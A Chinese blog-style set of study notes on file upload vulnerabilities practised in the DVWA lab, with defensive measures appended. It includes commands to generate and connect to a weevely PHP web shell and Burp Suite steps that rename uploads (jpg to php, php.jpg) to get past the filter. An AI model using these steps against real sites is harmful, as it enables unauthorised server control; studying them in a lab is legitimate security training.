4.文件上传

文件上传

1. DVWA

  • 默认登入帐号密码 admin password
  • DVWA 修改安全等级 在DVWA Security 中选择然后submit

2. 工具 weevely

  • 生成shell.php weevely generate 123456 /home/kali/shell.php在/home/kali/下生成shell.php文件,设置密码为123456

  • 在DVWA中上传shell.php

  • 远程控制 weevely http://192.168.1.104/dvwa/hackable/uploads/shell.php 123456

3. 拦截请求 Intercepting HTTP Requests

  • 工具 Burp Suite
  • 在浏览器设置代理模式,网络设置的ip与端口与Burp Suite中proxy–options–proxy listeners的ip和端口一直
  • 使用完Burp Suite后,将浏览器的代入模式关闭

4. 使用高级文件上传漏洞 Exploiting Advanced File Upload Vulnerabilities To Hack Websites

  • 设置DVWA安全模式为medium(此时DVWA无法直接上传php文件)
  • 借助Burp Suite
    1. 将php后缀改为jpg,然后上传
    2. 在Burp Suite中截获请求,将Burp Suite中proxy–intercept–intercept is on下面的Content-Disposition: form-data; name=“uploaded”; filename="shell 2.jpg"中shell 2.jpg改为shell 2.php
    3. 远程控制 weevely http://192.168.1.104/dvwa/hackable/uploads/shell2.php 123456

5. 利用更多高级文件上传漏洞 Exploiting More Advanced File Upload Vulnerabilities

  • 设置DVWA安全模式为high
  1. 在Burp Suite中将shell3.jpg改为shell3.php.jpg
  2. 远程控制
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件上传漏洞是指攻击者通过上传恶意文件的方式,绕过应用程序的安全机制,将恶意文件上传到服务器上,从而实现攻击目的。常见的文件上传漏洞绕过方式包括以下几种: 1. 修改文件类型:攻击者可以修改上传文件的文件类型,将恶意文件伪装成常见文件类型,绕过检测机制。 2. 绕过文件类型检测:上传文件时,应用程序会检测文件类型,如果上传的文件类型不符合要求,则会拒绝上传。攻击者可以通过修改 HTTP 头部信息或者使用特殊字符等方式,绕过文件类型检测。 3. 绕过文件大小限制:应用程序通常会限制上传文件的大小,攻击者可以通过分割文件、压缩文件等方式,绕过文件大小限制。 4. 绕过文件路径检测:应用程序会检测上传文件的路径,如果路径不符合要求,则会拒绝上传。攻击者可以通过构造特殊的路径,绕过文件路径检测。 5. 绕过文件名检测:应用程序会检测上传文件的文件名,如果文件名不符合要求,则会拒绝上传。攻击者可以通过构造特殊的文件名,绕过文件名检测。 为了避免文件上传漏洞的攻击,应用程序开发人员可以采取以下措施: 1. 对上传文件进行严格的类型、大小、路径、文件名检测,确保上传的文件符合要求。 2. 对上传文件进行病毒扫描和安全检测,确保上传的文件不包含恶意代码。 3. 限制上传文件的存储路径,确保上传的文件不会对系统造成危害。 4. 对上传文件进行权限控制,确保只有授权的用户才能访问上传的文件。 5. 定期更新应用程序和服务器的安全补丁,确保系统处于最新的安全状态。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值